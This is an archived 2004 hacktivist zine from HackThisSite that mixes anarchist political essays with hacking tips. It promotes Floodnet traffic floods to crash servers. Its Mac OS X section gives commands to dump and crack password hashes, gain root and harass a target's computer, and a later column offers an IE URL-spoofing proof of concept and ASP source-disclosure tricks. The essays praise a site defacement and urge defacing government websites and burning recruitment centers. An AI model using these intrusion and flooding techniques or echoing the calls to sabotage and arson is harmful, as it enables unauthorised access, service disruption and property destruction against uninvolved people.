💾 Archived View for library.inu.red › document › hackthissite-org-hack-this-zine-01 captured on 2023-03-20 at 22:08:34. Gemini links have been rewritten to link to archived content

View Raw

More Information

➡️ Next capture (2024-07-09)

-=-=-=-=-=-=-

Title: Hack This Zine! 01
Subtitle: electronic civil disobedience journal
Date: Summer 2004
Source: Retrieved on 2022-03-16 from [[https://www.exploit-db.com/exploits/42907][exploit-db.com/exploits/42907]]
Authors: HackThisSite.org
Topics: hacking, hacktivism
Published: 2022-03-16 05:56:41Z

<example>

Hack This Zine! Summer 2004

electronic civil disobedience journal

DISTRIBUTE ME WILDLY!

This community publication is entirely free to own and free to share. We

only can afford to publish a limited amount of copies. We count on people

to pass the zine on to friends, local computer stores, hacker groups, 2600

meetings, libraries, bookstores, newstands, etc. Remember, you’re a part of

this movement - help spread the word!

HOW TO GET ADDITIONAL COPIES

Copies are available from Unbound Books internet/mail order distribution:

$5 for one zine. Check unboundbooks.org for ordering information. Special

bulk pricing is also available for all who want to help distribute the zine.

Email webmaster@hulla-balloo.com for custom pricing, please describe

your intent, area of distribution, and desired quantity. International orders,

check the zine website for local contacts who can ship to your area.

Please include your address, comments, and cash/money order to cover

production / postage costs. Or you can paypal us at webmaster@hulla-balloo.

com. More details, check out: http://www.hackthissite.org/zine/

GET INVOLVED WITH HACK THIS SITE!

WWW: http://www.hackthissite.org

CHAT(IRC): irc.hackthissite.org / irc.mattburdine.com #hackthissite

Use a web-based java irc client at hackthissite.org/irc/

Email(can’t always respond - but we do read!)

zine@hackthissite.org - zine related concerns

hack@hackthissite.org - site / organization related

webmaster@hulla-balloo.com - criminal mastermind

Meetings are held in IRC every few weeks

PARTICIPANTS

HTS STAFF:

Xec96

ReDucTor

DarkOneWithANeed

spiffomatic64

The_Anarchist

Sanjuro

OutThere

Darksider

kleinnico

SavageTiger

weekend hacker

soulsyphon

IceShaman

blakhawkftp

Shox2daShox

BIG

ikari

WolfSage

mraellis

psyche

MrBrett

Wyrmkill

bigpy2003

buz

ZINE TEAM:

Xec96

Pantalaimon996

blakhawkftp19

Daemon13

SUBMISSIONS

DragonMaw

RaH

Xec96

psyche

Fetus

Trojan

plastek

ikari

ReDucTor

EDITING

Fetus

arun

Peter Wortz

caliginouschild

ELECTRONIC COPIES OF

HACK THIS ZINE

While we charge for physical copies

of the zine to cover production costs,

we believe that all information should

be free. Electronic copies of HTZ are

available in PDF and TXT form online.

Please distribute wildly to friends, local

computer and hacker user groups,

libraries, bookstores, etc.

hackthissite.org/zine/HTZ1.txt

hackthissite.org/zine/HTZ1.pdf

HTZ OPEN SUBMISSIONS!

Hack This Zine is open to all submissions

of any sort - articles, pictures,

cartoons, hacks, ideas, whatever you

think would be appropriate. We cannot

publish everything but we certainly look

everything over. If you get something

printed, we’ll send you a free zine! Send

everything to zine@hackthissite.org.

HACK THIS SITE

COLLECTIVE

HTS is a volunteer project run by the

Hack This Site collective. We operate

using a directly democratic decision

making process without any authoritative

hierarchy. We engage in open

meetings over IRC where all users are

invited to participate.

For more information about how this

project is structured, please see the

HTS Project Organizing Guide at:

hackthissite.org/info/organize.php

hackthissite.org/info/organize.pdf

Hack This Zine?

Most people familiar with Hack This Site might be a

bit confused. A magazine? I thought HTS was about

wargames and security challenges. Yes, but over the

past year we’ve experienced so much more with the development

of the IRC server, user-submitted articles and

resources, forums, and the internal staff structure. We’ve

become a living community with many on-going projects

managed by active users sharing their experiences with

others. It has become necessary to begin publishing a

magazine to explore the hacking scene. The movement

we were building has more social signifi cance than a

mere training ground.

Activism? I thought this was a hacking zine...

Purely hacker zines have been done to death thousands

of times, never making any impact in the status

quo by shaping culture or politics. Instead of reinventing

the wheel and competing with other larger distros by

merely keeping up with the latest tech news, we’re going

to be discussing the practical usage of hacking skills as

a means to fi ght for social justice. Considering today’s

political climate, it is becoming increasingly imperative

that we tune in to the world around us, to take a stance,

and give a fuck.

It is foolish and destructive to expand one’s hacking skills

without the development of social awareness, knowledge

of current events, and political ideology. Our intention is

not merely to raise technical consciousness, but social

and political as well. We intend to keep up with the latest

hacktivist news - updates on electronic civil disobedience

campaigns, the latest threats of cyber tyranny against

our civil rights, and ways people can get involved in the

digital freedom movement.

The New World Order

Nonstop cycles of fear, consumption and wage-slavery.

We are pumped full of fear-mongering propaganda so

that we willingly submit ourselves to the State’s oppression

- giving them free reign to systematically destroy

our freedoms and bring about a new age of big brother

well beyond the imagination of George Orwell. Initiatives

like Total Information Awareness, the USA PATRIOT Act,

Operation TIPS, email monitoring systems, the Offi ce of

Homeland Security, RFID product codes, and the continuous

attempts to tap and monitor all mediums of communication

make it clear of the establishment’s intent to

transform our society into one where our every thought

and movement is closely monitored and calculated to

see whether we are a threat to their cold, sterile dream

of law and order.

There’s a fucking war on!

We are kept under tight control and surveillance so that

the military industrial complex can continue to manufacture

bullshit pretexts for fake wars all for the profi t of the

rich ruling classes The Bush administration has made a

killing in privatizing Iraq’s oil resources(Halliburton), reconstruction

efforts(Bechtel), and otherwise allowing his

corporate buddies to loot Iraq for all it’s worth. For weapons

of mass deception and no ties to Al-Qaeda or 9/11.

Are we any safer from terrorist attacks? Every friend and

family member of the tens of thousands of innocent civilians

that died in Iraq are now looking at ways of getting

back at the U.S. The utter hypocrisy of the war on terror...

we have killed several times more people that have died

on 9/11. Pre-emptive war is state-sponsored terrorism.

Carpet bombing cannot address the complex social and

political factors that actually create anti-american terrorism

- in fact, it feeds it.

We are building an international movement to defend the

rights of all people to self-determination from the ruling

classes of nations worldwide. We want neither Bush,

nor Saddam, nor Blair. Together we can organize in an

open and equal basis and build our own societies free of

authoritative power structures and parasitic bosses and

rulers.

The Digital Freedom Movement

While the madness of the State is spiralling towards self

destruction, we’ve built our own communities based on

the open spirit of free access to all information. Open

source programming has successfully developed some

of the best softwares, operating systems, and mediums

of communication - all free to own and free to share, independent

of authoritative power structures. It is a practical

application of anarchist organizing principles.

It is of little surprise that our movement is under attack

by large capitalists like Microsoft, SCO, and the record

industry. Because our software is free to own and free

to share, their monopoly over computing and media industries

is threatened because they cannot compete with

their bloated, obsolete and expensive systems. Rather

than finding ways of integrating these fantastic services

into our society, corporations will go to any length to cling

to their outdated models of profit and exploitation. We

need to directly to the heart of the matter: we are under

attack, and we have to equip ourselves to fight back.

It’s one attack, one struggle.

All of these injustices are not unrelated. These struggles

are linked, and everything is connected. It’s the system!

From the presidents that bring the people to war, to the

cops that beat protesters, to the bully on the playground

stealing lunch money, it is becoming glaringly obvious

that we cannot trust figures of authority. It’s up to us to

organize on a cooperative, anti-authoritarian basis and

build our own free societies on the ashes of the old.

We don’t have a lot of time left. Whether it be the madness

of the warring nations, or the destruction of the environment,

or the depletion of natural resources... we are

simply consuming, reproducing, and expanding too fast

for our finite ecosystem to support us. Every species has

a carrying capacity. We are rapidly approaching ours.

This isn’t a call for pessimism, but rather the fantastic

potential that we have the ability to create dissent, rise

up and put direct pressure on those responsible for this

madness. Now that everything depends on complex networks

of communication and the internet, hackers are

in a unique position to mobilize their skills to fight for

change.

Hacking as a tool to fight for social justice?

The practical application of hacking skills to fight for freedom

is a beautiful act of justice and liberation. If the Nazi

military utilized computer networks to coordinate troop

movements, hackers could have thrown their war machine

into disarray. If corporations and governments are

out of line today, it’s up to cowboys of the electronic age

to turn over the system and put the people on top. Electronic

civil disobedience, modern day Robin Hood, cyber

activism, hacktivists!

Circumvent corporate media - Do It Yourself!

The forces that be are allowed to get away with murder

because they own most channels of communication. The

Clearchannel Coporation owns 1225 radio stations and

37 television stations. They are in the top 248 of the top

250 radio markets. Television, news and radio networks

are largely dominated if not monopolized by these large

corporations who have vested financial interests in supporting

government, war, and international neo-liberal

trade organizations. They fill us with their lies and distortions

and turn us into unthinking, unquestioning followers

of the establishment. Even in this age of internet enlightenment,

hackers are portrayed as cyberterrorists.

At the center of Hack This Site is the drive to DO IT

YOURSELF! Turn off that television, unplug yourself

from their system, and make your own media! Underground

literature will not sugar coat the news fit for your

unthinking consumption - we tell the uncensored truth,

explore controversy, create a platform for the free exchange

of ideas, and don’t patronize our readers by

sugar coating raw information.

Hack This Site!

Hack This Site is a training ground for people to gain

the skills and join the movement for digital freedom. We

facilitate a free, open learning environment where hackers

can test and expand their skills in a realistic and

legal environment Everyone should have access to all

information, resources, and the opportunity to fulfill one’s

potentials. Of course, providing such resources requires

great responsibility to see that these skills are used for

positive ends. We present the usage of hacking skills as

a means to fight for social justice as a positive alternative

to mindless destructive black hatting. We’re building an

army so powerful we won’t need weapons. Our revolution

will require not bullets or casualties, but the curious

drive of a politically motivated generation of hackers who

know how to shift data around in the right direction.

Hackivists of the World, UNITE!

Floodnet: Power to the People! by Trojan

In our modern age of internet enlightenment, new

and innovative forms of protest are emerging

on the web. One tool spearheading the protest

movement is Floodnet. Floodnet is a java applet

refreshing a selected page every seven seconds.

Alone this have no real purpose, but when hundreds

or even thousands of floodnet users connect

to a page, the surge in traffic easily can crash

a server. Many Major attacks have already been

utilized including one on the Pentagon.

The program is genius in its simplicity. This strikes

fear into the hearts of companies. The idea that

thousands across the world can easily be armed

for virtual warfare strikes a deep chord within

them.

“Strength in numbers” as they say. I was recently

told of one account in which the eCommerce site

“Etoys” sued a smaller website, and floodnet community

member “Etoy”, claiming that etoy simply

desired traffic from typos of the word “Etoys.com”.

The members of the Electronic Disturbance Theatre

(The Originators of Floodnet) threatened to

hold a “Twelve days of Christmas” strike to bring

etoys stock to zero. Needless to say, etoys backed

down, and even payed for etoy’s court costs.

What could be scarier to a company? They may

be used to having people hate them, but the

idea of thousands that can strike back? So much

power in the hands of the commoners? Floodnet

allows for this.

“Only art history still knows that the famed geniuses

of the Renaissance did not just create

paintings and buildings, but calculated fortresses

and constructed war machines. If the phantasm of

all Information Warfare, to reduce war to software

and its forms of death to operating system crashes,

were to come true, lonesome hackers would

take the place of the historic artist-engineers.” -

Frederich Kittler

Strength in numbers indeed.

MORE ON ELECTRONIC CIVIL DISOBEDIENCE:

Electronic Disturbance Theatre

thing.net/~rdom/ecd/ZapTact.html

Electro Hippie Collective

fraw.org.uk/ehippies/tools.shtml

The Hacktivist

http://www.thehacktivist.com/

The Federation of Random Action

http://www.this.is/etoytech/fra/

Electronic Product Code / RFID:

New meaning to Big Brother

Attacks on civil liberties and the Orwellian transformation

of our country are not new concepts to

those who have not been living under a rock for

the past few years. We have legislation like the

USA PATRIOT Act that gives unprecedented police

state powers to law enforcement and government.

We have government spy agencies such as Total

Information Awareness (now named ‘terrorist information

awareness’) that watches our credit card

purchases, what library books we check out, websites

we visited, and where we travel. The Office of

Homeland Security, Carnivore, Echelon, Operation

TIPS, etc. But many people are relatively unaware

of a new technology that when introduced to the

mainstream will set new precendents to the survellience

powers of corporations and governments.

Over the next few years, the old UPC barcodes of

times past will be replaced by the new Electronic

Product Code (EPC). This new system implements

a technology known as Radio Frequency Identification

(RFID). They are mini chips that transmit radio

waves that contain unique identifying information.

These transmissions are picked up by nearby base

stations which logs the time and location. Unlike

the UPC, these new EPC chips contain a unique

code for each individual instance of a product instead

of just what type of product. This means they

will be able to track where your individual product

is at any time.

The EPC will make its appearance in the mainstream

quicker then you might imagine. By 2005,

every product sold at Walmart will contain these

RFID tracking chips. Some corporations are already

using these chips(Gilette). Eventually, the

UPC will be phased out completely and most consumer

products will carry these chips. On your

watch, your shoes, your and you won’t be able to

buy something more expensive than a snickers bar

that doesn’t have an EPC chip. The European Union is

even considering using this chips on cash (removing the

anonymous quality desired by undergrond revolutionary

hackers who do not trust the banks and credit card

corporations - and rightfully so!)

Corporations say that these chips will be used to

gather marketing information by monitoring what

stores you shop at, where you live, and to prevent

shoplifters. There is no current legislation about the

placement of these chips or it’s use - products containing

RFID do not need to be marked or disabled

as they leave the store.

It is not hard to understand the immense threat to

our civil liberties that this new technology presents.

Since they are already able to connect purchased

products to the credit card information in your

name, there is no end to the amount of information

they will have. We are not far off from a world

where we can be tracked wherever we go from

little chips embedded into our clothes, shoes, and

watches. A world where governments and corporations

know what shops we visit, what products we

have in our homes, and what we’re carrying on us

at any given time. It sounds surreal, but these are

crazy times...

The RFID chips themselves can be disabled rather

easily - but their strength is in their relatively inexpensive

price to produce and the ability for these

chips to be rather obscurely hidden within consumer

products. What needs to be explored is the

servers and data capturing networks that log the

movement of these chips. Such systems would

be very attractive targets for hackers fighting cyber

tyranny. Also, there needs to be new devices

that can produce a counter effect to the RFID chip.

It is up to the us, the people, to counteract these

malcious intrusions. This will become increasingly

imperative as years pass by and RFID becomes

tightly intertwined with American consumer culture:

where we will not be able to live our lives without

these chips watching our every move.

More reading about RFID / EPC:

http://news.com.com/2010-1069-980325.html

http://www.spychips.com

http://www.caspian.com

Hack This Zine summer release

Our first hacktivist magazine is published! 24 pages

of the latest updates in electronic civil disobedience

campaigns, exploits, activism, and more.

Available in PDF, TXT, HTML and in print by mail

via Unbound Books distribution collective. We

are launching an international campaign of distribution:

people are encouraged to distribute as

many copies as widely as possible to local libraries,

hacker meetings, infoshops, computer user

groups, etc. We are looking for people to help redistribute

copies in their

HOPE Hacker Convention

Jule 9-11 | NYC | the-fifth-hope.org

DEFCON 12 Hacker Convention

July 31-Aug 1 | Las Vegas | defcon.org

DNSCon network security council

August 13-15 | Blackpool, UK / dnscon.org

HTS is planning on having a presence at the

DEFCON 12 / HOPE / DNSCON hacker conventions.

We’re setting up a booth to distribute HTS

pamphlets, sell copies of the zine, and set up

systems where people can play the challenges.

All are invited to come chill with the developers

of HTS. We are also planning on getting a hotel

room where we can get together as many HTS

people as possible to go on all sorts of crazy adventures.

CrimethInc National Convergence

Aug 20-Aug 26 | Des Moines, Iowa | crimethinc.com |

bestplaceever.com/crimethinc/

All are invited for a weeklong anarchist training

session. There will be radical video showings,

direct action training, organizing workshops as

well as other mischief and mayhem. Immediately

afterwards all will be travelling to particpate in the

actions against the Republican National Convention

in NYC.

Republican National Convention

Aug 29-Sept 4 | NYC | rncnotwelcome.org

The RNC is being held in New York City in an attempt

to capitalize off of the fears and emotions

surrounding the 9/11 terrorist attacks. George W.

Bush will be nominated as the presidential candidate

of the Republican Party. Hundreds of thousands

will descend upon the city to see that the

event ends in total failure. Groups are also organizing

an electronic civil disobedience campaign

against a variety of right-wing and corporate websites.

All are encouraged to help protest in any

way they can.

Fundamentals of Mac OS X Security

Hardly considered hacking at all, these tips are

required security basics when using Mac OS X.

If you have access to the command line in Mac

OS X under any user, you can get NetInfo to dump

passwd information to stdout with the following

command: ‘nidump passwd .’ DES-encrypted

passwords are dumped to stdout. You can run this

through any standard UNIX password cracker like

John The Ripper(also available for Mac OS X at

openwall.com/john).

Another way of gaining root is to sudo su root

it - allowing you access to a root prompt only by

knowing an administrator account(which can be

retreived through nidump). You can also reset the

administrator password by booting from a Mac

OS X install cd.

If you have physical access to the machine, try

restarting and holding Command + S - this will

boot into ‘Single User Mode’, which is essentially

a root shell. Note that you will not be able to dump

the passwd database until you load the NetInfo

Database, which you can do so by runnng /sbin/

SystemStarter.

If you’ve got shell access, there’s all sorts of fun

things you can do. Personally, I like Mac OS X’s

built-in speech engine used in conjunction with

osascript, a command line AppleScript interpreter.

Try executing this:

[local:~] xec96% osascript -e ‘say “you are being

watched”’

Assuming they have the volume turned up at a

reasonable volume(you can set system volume

by doing XXXXXXX), this will cause their computer

to physically speak the given parameter. This

can provide an endless supply of amusement, especially

if you are near enough as to hear the target

have entire conversations with their machine.

Since you have access to AppleScript’s entire array

of neato system functions, there are other fun

things to do as well.

• Open browser to a specified website

[local:~] xec96% osascript -e ‘open location

“http://www.larrycarlson.com/the_end”’

• Control iTunes and play music

[local:~] xec96% osascript -e ‘tell application

“iTunes”’ -e ‘next track’ -e “end tell” (also in place

of ‘next track’, try ‘previous track’, ‘pause’, ‘play’,

and ‘open “Macintosh HD:something.mp3”’)

• Open all apps at once(essentially freezing)

[local:~] xec96% open /applications/*

Fundamentals of Mac OS X Security

[local:~] xec96% nidump passwd .

root:gRhAAGQx4AoKk:0:0::0:0:System Administrator:/var/root:/bin/tcsh

xec96:Kh79zSBCAZos6:501:20::0:0:Jeremy Hammond:/Users/xec96:/bin/tcsh

Hacktivists Deface DARE.com in Act of Electronic Civil Disobedience

republished from http://la.indymedia.org/news/2004/02/104143.php

Hackers have targeted DARE.com in political protest

of the criminalization of marijuana, the hypocrisy of

the war on drugs, and the indoctrination of today’s

youth through the DARE program.

“The establishment continues to ignore the positive

psychological benefits of mind altering chemicals

are used responsibly for the personal exploration of

consciousness. Marijuana, both harmless to society

and ourselves, is not the problem. Marijuana laws

are the problem. Millions of innocent people are

unjustly imprisoned while corporate criminals and

war mongers are trusted to the highest positions of

our government.”

The website was defaced on Feb 29, 2004 with

pro-legalization messages, criticisms of the

DARE program, justifications for electronic civil

disobedience, and links to dozens of websites where

people can learn about the legalization movement,

mind-expanding chemicals, political activism, and

more.

The hackers have done no permanent damage to

the systems, or released any sort of confidential

data - in fact, the hackers actually fixed the security

holes to combat the media stereotype that hackers

are malicious and destructive with a loose sense of

social ethics.

“We aren’t malicious, destructive, or have a loose

sense of ethics like the government, corporate media,

or right-wing maniacs would like to spin it. Those who

open-minded and curious enough to do the research

and actually try to understand us will realize that we

have a highly refined sense of social ethics, more

than the machinery of the state will ever have.”

The hackers have also posted a flyer to help build for

the demonstrations against the Republican National

Convention on August 29. rncnotwelcome.org

Hacktivists Deface DARE.com in Act of Electronic Civil Disobedience

republished from http://la.indymedia.org/news/2004/02/104143.php

Note from HTS staff: we are not defending the actions of the

actions of the hackers who attacked DARE.com, but it is a

welcome change of pace to see a defacement that actually

made serious political points without causing any damage.

This is why we chose to feature this defacement in our zine.

All too often hackers step up on the soapbox and deface a

major website and leave some lame message like ‘I h4x0r3d

j00! c0nik was here - get more secure!’ If you are going to

take the time and risk breaking the law, then at least have

something significant to say.

Miami Police Riot as the

Rich Hide Behind Fences

On Thursday, November 20 2003, governments and the ultra-rich held the

Free Trade Area of the Americas ministerial in Miami, Florida. The FTAA is a

trade agreement that decides the economic fate for 800 million people. Those

working on advancing the FTAA are seeking to create a “free-trade” block to

encompass all of North and South America (minus Cuba). This is being done

with absolutely no citizen input and has no chance to ever be ratified by the

people it governs.

In the days before, the ultra-rich and government officials mingled in the

American Business Forum to craft a plan for the FTAA, and one that was

eventually accepted. The rich and powerful were frightened though, so much

that they constructed a massive “anarchist-proof” fence surrounding a large

part of downtown Miami for the upcoming protests. Also, over 3000 police

were on duty, hired security for the interests of the upper class. Armed to the

teeth with rubber bullets, pepper spray, tasers, taser shields, tear gas, batons,

full riot gear, shields, armored personnel carriers, blackhawk helicopters, and

more, they turned Miami into a militarized police state in the days leading up

to the event. Over 32 law enforcement agencies participated in the effort- on

the streets there were everything from armed and deputized private security

contractors to Miami PD and even the Department of Homeland Security. 8.5

million federal taxpayer dollars were spent on police efforts to protect the richest

1% during the meetings. So why did the government decide to turn Miami,

amerika’s poorest large urban center, into a complete police state to protect

these scumbags?

Well, they say it was because of anarchists...

In the months leading up to the ministerial, people from all over the hemisphere

were planning on making their way to Miami on November 20. All sorts

of people mobilized for the Miami demonstration - Union workers, Students,

Farmers, Indigenous Peoples, Anarchists, Communists, and Religious groups.

The governments of the amerikas have routinely used military-style police

force to violently silence the voices and intentions of the people during these

demonstrations. To justify their fascist behavior, they repeatedly claim that a

group of “hard-core anarchists” come to destroy everything in the city and

cause mayhem in the streets. This lie is pushed through the televisions, newspapers,

and by police harassment of communities. By the time the demonstrations

come around, there is a media blackout on anything except for the sensationalized

police spin. The whole idea of “anarchists causing chaos” is actually

a fabricated historical argument, used since the 1800’s by the state and the

rich to discredit the motives and smear the name of anarchists. Anybody who

can open their eyes knows that the FTAA is true violence, that the police and

the governments that sponsor them are the true violence, and most of the

violence in the world is caused by them. Anarchists want to trade that violence

for peace and justice for all of humanity, not just the rich and powerful.

So what happened?

The protests started with the Root Cause march beginning 34 miles awaymarching

one mile for every country involved with the FTAA. The Root Cause

march involved many folks who are currently engaged in struggles against the

effects of neoliberal capitalism- the Coalition of Immokalee Workers, Miami

Workers Center, Power U Center for Social Change, Low-Income Families

Fighting Together, and the Free Carnival Area of the Americas. On Thursday,

November 20 was the main day of demonstration. Early morning saw a few

arrests from the more confrontational Direct Action marches. The largest

permitted rally was the AFL-CIO march, where thousands were corralled and

humiliated by police. While this march was filing into the Bayfront ampitheatre

around 4 P.M., a group of nearly 1000 people were dancing and milling about

near a police line. With no provocation, the police started firing rubber bullets,

pepper spray, pepper spray bullets, tear gas, and other projectiles into the

crowd. As the elderly, workers, students, and immigrants who couldn’t get

arrested started retreating, another police line blocked one of the two possible

exit routes- channeling people into downtown Miami

and eventually into a poor black neighborhood called

Overtown. Militant protestors constructed makeshift barricades

and put their bodies in front of the crowd. They

also defended the crowd fiercely, with slingshots, smoke

bombs, chunks of concrete, and quick maneuvering to

outpace the slow riot-gear clad stormtroopers. These

tactics prevented a mass arrest from happening- the

police scanners were reporting that they were trying to

surround the large group but couldn’t because of it’s

quickness. At the end of the day, there were about 50

arrests. Later that night word got out that a “FTAA-lite”

was drafted on Thursday.

The next day, hundreds of people went to the jail to

show support to their fallen comrades, and the legal

demonstration was surrounded by police as people were

beaten, pepper sprayed, and thrown in prison- even

though the crowd remained completely peaceful. The

legal defense team has confirmed that there were 4

instances of sexual assault upon prisoners and at least 6

cases of physical torture in jails- ranging from the police

and guards pepper-spraying inmates, beating inmates

bloody, and hosing naked inmates down with freezing

water in cold cells. At least 2 people were sent to the

hospital for head wounds, not counting the hundreds

that were treated by volunteer medics in the streets for

exposure to tear gas, pepper spray, baton blows, rubber

bullets, etc. Police actions have prompted the AFL-CIO,

United Steelworkers of America, and the Alliance for

Retired Americans to call for a congressional investigation

of the police efforts for Miami.

Free Trade = Slave Trade

The FTAA is part of a plan that started with the implementation

of North American Free Trade Agreement

on January 1st, 1994. NAFTA has caused hundreds of

thousands of high-paying jobs in the U.S. to be shifted to

sweatshop areas (often called “maquiladora zones”) in

Mexico and other places. Using NAFTA rules, Metalclad

(a US corporation) sued Mexico because a poor community

didn’t want Metalclad’s toxic waste dumped near

them. They won and Metalclad got $16 million from the

case. Canada banned a gasoline additive called MMT

because it was highly toxic to humans, and using NAFTA

rules, Ethyl Corporation forced Canada to drop the ban

and pay them money because the law was “unfair”.

NAFTA has literally run over democracy in communities

all over North Amerika in the interest of profits. One of

the main components of economic globalization is the

idea that “business has a right to make a profit”. Put

simply, this means that making a profit is more important

than life, democracy, or justice. The goals of these

agreements are to make it easy for corporations to strike

down regulations like clean air and water laws, minimum

wage laws, worker safety laws, and others. The whole

process is undemocratic, with secret meetings and “fast

track legislation” that prevents congress from ratifying

trade agreements.

The FTAA seeks to extend NAFTA to include all of North,

South, and Central Amerika, minus Cuba. If they cannot

do this through the FTAA, they will do it piece by piece

through regional trade agreements like the Central

American Free Trade Agreement. CAFTA is set to be

finished by this year and has the same vision as NAFTA

and the FTAA. These trade agreements contain different

plans, such as Plan Puebla Panama. PPP’s aim is to

destroy rainforests, displace indigenous communities,

and build a sweatshop superhighway through Cental

Amerika and Mexico leading into the United States.

Here, the workers will be paid dirt wages to make products

for US corporations, the products will be shipped

north and sold in amerika at inflated prices- once again

making insane profits for the rich who control the corporations

at the expense of the working poor.

Viva Resistencia!

Neoliberal globalization agreements have caused global

unrest since they were conceived. When NAFTA was

first implemented, indigenous communities led a rebellion

from the Lacandon jungle in the state of Chiapas,

Mexico.

In 2000, neoliberal policies caused Bolivia to sell its

water system to Becthel Corporation. Thousands of

people took the streets and forced the government to

end the deal. In Quebec in 2001, thousands of people

fought running street battles with vicious police that

tried stifling dissent. Over 4000 canisters of tear gas

were dispensed-some of which disrupted the meeting’s

activities. This is not to mention many other international

demonstrations and uprisings against other gears in the

machine of global capitalism- institutions like the World

Trade Organization, the International Monetary Fund

and World Bank, World Economic Forum, Trans-Atlantic

Business Dialogue, and Group of 8. The G8 is meeting

this June in Sea Island, Georgia.

More information at:

ftaaimc.org / infoshop.org / indymedia.org / midwestunrest.net /

globalexchange.org/campaigns/ftaa/.

Fuck the Draft

Preperations are being made to bring back mandantory

military service within the United States. Proposed legislation

entitled the Universal National Service Act of 2003

would “provide for the common defense by requiring that

all young persons [age 18--26] in the United States, including

women, perform a period of military service or a

period of civilian service in furtherance of the national defense

and homeland security, and for other purposes,”.

Women would not be exempt from being drafted, and

college students would be brought in upon completion of

their current semester.

The bill currently sits in congress while the Selective Service

System with an additional $28 million is in preperations

for the draft. The SSS is expected to present to the

Bush administration on March 31, 2005 that the system

is ready to handle the draft. If the legislation passes, the

draft could start as soon as June 15, 2005 - after the

elections.

At the moment most military officials and politicians are

denying the need for a draft at this point in time. But the

occupation of Iraq is getting worse and worse every day

and there is no indication that we will be pulling troops

out anytime soon. Bush’s perpetual ‘war against terrorism’

might last decades and decades, and new wars will

require new cannon fodder.

While most of the madness of the war on terror was

brought about by Bush and the Republicans, it is interesting

to note that the draft legislation was proposed

by democrats. Even if we do manage to get

Bush out of office we will still be “staying the course” in

Iraq and the war on terrorism; considering that the Vietnam

war was escalated by Lyndon Johnson. Kerry voted

to support the war in Afghanistan, Iraq, and the USA PATRIOT

Act: don’t be surprised if they bring back the draft

under the Kerry administration.

Realizing that the trend of unjust attacks on our freedoms

will continue under either a democratic or republican

presidency, it will become increasingly necessary

to explore creative tactics of resistance outside the realm

of mere electoral politics. The next several years we will

be witnessing a radical transformation of our society and

the way we live . We can no longer afford to be apathetic.

It’s time to stand up and fight back. Extreme times call

for extreme measures; the fight for freedom and liberation

knows no bounds. Evading the draft, defacing government

websites, and burning recruitment centers, all

of which and more are serious tactics that need to be

considered if we can ever hope to resist and overcome

this injustice.

Bugs in the Wild by Rah

Well my friends, I have finally decided to start writing

this column. After much thought, I was at a

loss as to what to write about as far as “Bugs in

the Wild” go. I mean come on, there are just so

many that I would never be able to list them all

in one article. So taking into careful consideration

a few factors I have compressed the column into

what I believe www.HackThisSite.org users will

benefit from.

Before I begin the actual “meat and potatoes” of

the column, I’d like to take a minute to introduce

myself to everyone. I go by the screenname RaH

on HackThisSite. I have been a user of the site for

around 6 months or more. Hacking has interested

me since I got my first computer 7 years ago.

BLEH! Enough on me, who wants the Bugs?

The bugs I have for you in this edition are by no

means 0day exploits. Anyone who can use a

search engine can find this information out for

himself or herself. All right. Having gotten that out

of the way, allow me to introduce you to our first

“Bug in the Wild”. This bug has been around for

sometime, it is I think a well known exploit dealing

with the way some “Shopping carts” at sites

handle user input. The vulnerability exists in dealing

with hidden form fields. By downloading the

web-page, one is able to alter the price of an item,

change the url then make their purchase for their

altered price and then buy said item. I thought I

would add this one, because in a way it pertains

to a level on HackThisSite.org. I’ll not tell which.

We all know Microsoft is a buggy OS. We all have

had at one time or another the dread “Blue Screen

of Death” lovingly referred to as the B.S.o.D.

There exists many vulnerabilities in the OS itself

and also the applications it comes with. I’ll use

Internet Explorer as my next bug in the wild. To

exploit this rather lame trick, one simply creates

a web page containing a link to another page.

What makes it so special is the fact that once

viewed in IE the address is spoofed to be any site

you want. For this one I’ll include proof of concept

code. By using the tag <a href=”www.snap.

com%01@hackthissite.org>LINK</a> a viewer is

tricked into thinking they are viewing www.snap.

com. When they see the page though, it looks as

if www.HackThisSite.org has been put up in it’s

place. This bug works because of URL handling

compliance. It turns out that because IE is compliant

with present standards this bug occurs. The

%01 is not seen by IE thus everything after it is

hidden from the browser, yet it still gets directed

there. Odd stuff.

The next few are also MS related allowing for remote

code execution by an attacker. NOTE: I will

not post proof of concept code for these. Again

all of these bugs can be found on most security

sites.

In Microsoft VB for applications, there exists a

heap-based buffer overflow condition. When exploited

properly remote code execution is possible.

By using a document with a long ID parameter,

VBE.DLL and VBE6.DLL are vulnerable.

This condition exists currently in SDK 5.0 through

6.3. There exists in IIS 4.0, 5.0, and 5.1 a crosssite

scripting vulnerability in the ASP function that

handles redirection. Which could be used to allow

a remote attacker to embed a URL containing

script in the redirection message.

For my last one, I will do one that I like. There

is no particular reason I like it except to say that

anyone can do it without a script. In ASP pages

you can coerce the server to give up more information

it should by using two extra . after the

asp tag. EX: www.hackthissite.org/rah.asp.. Now

there is a fix for that, but as quickly as they fixed

it a work around was found. By replacing the initial

dot www.hackthissite.org/rah( . )asp with the

%22 or %20 equivalent you are able to recreate

the bug. There is also another one for ASP pages

using ::$DATA EX: www.hackthissite.org/rah.

asp::$DATA can get you some choice info.

Well that about wraps up my column for this issue.

I hope you enjoyed it, and maybe even learned

from it. Remember hacking is a way of life. Should

you get caught, remember these words: “Drop not

the soap”!

OS Wars: Corporate giants stomping

the free software movement by RaH

STOP! Do not read this any further. You are now violating

some type of law! This very well could be the battle cry to

come. You must format your system immediately and then

turn it off.

In a landmark decision, The United States Supreme Court

ruled in favor of the Unix Operating System provider Santa

Cruz Operation or SCO. The SCO group fi led petitions

against several major corporations, the latest target being

Auto Zone. SCO claims that Auto Zone violated the Unix

licensing agreement because it is using a version of Unix

called Linux-an open operating system rapidly growing in

the software industry. In other news SCO dropped its lawsuit

against hardware manufacturer, IBM due to the lack of

evidence. The unanimous vote by the Supreme Court ruled

in favor of SCO. This decision means that all content on the

Internet; including content stored on personal computers,

is owned by SCO. You must uninstall everything from your

computer and never turn it on again.

Though the previous paragraph is fi ctitious, the drama it

portrays is very real. SCO did fi le a lawsuit against Auto

Zone and many other corporate giants. SCO claim that

these companies are using a version of Linux containing

proprietary SCO code. SCO petitioned the courts to have

these software companies searched though the details are

unclear as to what was actually copied from Unix.

In the past, SCO has been a major contributor to the Open

Source community, boasting it as “the way of the future”,

yet they are in court battling over code ownership. Just like

the corporate bully Microsoft, they are battling over money

and profi t. To preserve and patent is their business motto.

The written language has been around for centuries. Yet

no one have tried to copyright individual words. If words

are like functions in a program, then could these words or

code be owned? There are many unique ways of coding

the same function in a program. Copyright claims ought to

be enforced in the overall performance of a program, rather

